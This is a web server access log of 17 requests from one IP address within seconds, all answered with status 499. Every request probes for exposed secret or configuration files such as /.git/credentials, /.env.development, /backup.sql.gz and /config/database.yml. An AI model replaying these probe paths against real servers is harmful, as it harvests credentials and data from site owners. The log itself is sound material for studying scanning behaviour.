139.162.75.64 - - [03/Jul/2026:21:37:02 +0800] "GET /app.config HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:02 +0800] "GET /info HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:02 +0800] "GET /backup.sql.gz HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:02 +0800] "GET /api/aws/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:02 +0800] "GET /status HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:02 +0800] "GET /.git/credentials HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:02 +0800] "GET /_dev/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:03 +0800] "GET /Dockerfile HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:03 +0800] "GET /build/js HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:03 +0800] "GET /serverless.yaml HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:03 +0800] "GET /appsettings.Production.json HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:03 +0800] "GET /config/database.yml HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:04 +0800] "GET /config.json HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:04 +0800] "GET /.env.development HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:04 +0800] "GET /app HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:04 +0800] "GET /react HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:04 +0800] "GET /docker-compose.staging.yaml HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
